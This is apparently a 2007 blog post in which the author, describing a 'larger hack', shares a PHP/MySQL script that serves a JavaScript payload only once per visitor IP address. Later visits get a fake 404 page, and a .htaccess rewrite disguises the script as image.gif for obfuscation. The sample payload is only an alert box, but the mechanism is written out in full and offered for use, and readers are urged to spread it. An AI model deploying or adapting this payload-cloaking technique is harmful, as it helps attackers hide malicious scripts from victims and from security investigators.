Lately I was preparing a larger hack and I needed a Javascript code which is executed only once per user and IP address, no matter how often the box is going to visit my homepage.

I haven’t seen such a script anywhere before, so I thought sharing my solution with others who might have the same problem would be nice.

Okay let’s go, here is my approach in PHP (using MySQL):

1. “Call” the Javascript file from a normal HTML document via
   

   <script src=”http://path.to.my.script/script.js”></script>

2. Use a MySQL table to store the md5 hash of each visitor’s IP address
3. Compare the current IP hash with the IPs in the database, there are two possible results:
1. IP already stored (user has visited before):
   Serve a 404 Error Document
2. IP not stored yet (user is visits the first time):
   Serve the Javascript code and add the hash to the database

Huh, that wasn’t that terribly difficult, was it?

Let’s have a look at the PHP script serve_payload.php:

<?php
$user=’db_user’;
$pass=’db_pass’;
$db_name=’name_of_database’;

//connecting to database
$mysql_id=@mysql_connect(’localhost’, $user, $pass);
mysql_select_db($db_name);

//the visitor’s IP address
$ip=md5($_SERVER[’REMOTE_ADDR’]);

// check whether the IP already exists in database
$result=mysql_query(”SELECT `adress` FROM `iplist` WHERE `adress`=’$ip’”) or die(mysql_error());

if (mysql_numrows($result)==0) {
//IP not in database -> inserting it
mysql_query(”INSERT INTO `iplist` VALUES(’$ip’)”) or die(mysql_error());

/*
Javascript Payload beneath this point (in this case a proper HTML Document, not a .js file, but I hope you get the point.
*/
?>
<html>
<script>alert(’tricky XSS’);</script>
</html>
<?php
} else {
// the 404 error document
?>
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL was not found on this server.<P>
</BODY></HTML>
<?php
}
// finish
mysql_close();
?>

The table `iplist` in your database should look like this:

CREATE TABLE `iplist` (
`adress` varchar(32) NOT NULL default ”
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

And additionally some mod_rewrite stuff for obfuscation purposes, save this into a .htaccess file and place it in the same directory as the PHP script:

RewriteEngine On
RewriteRule ^image.gif$ /mybeNi/hacks/one-time_js_execution/serve_payload.php

(Of course you’ve got to replace the /mybeNi/blah/ directories with your “own” script path)

Now you’re finished and your own one-time JavaScript Payload is up and running.

You may test my example Javascript Payload (executed only once), now fellows, go and spread yourselves allover the world and have fun with it

This entry was posted on Wednesday, March 21st, 2007 at 10:45 and is filed under Programming, Websecurity. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.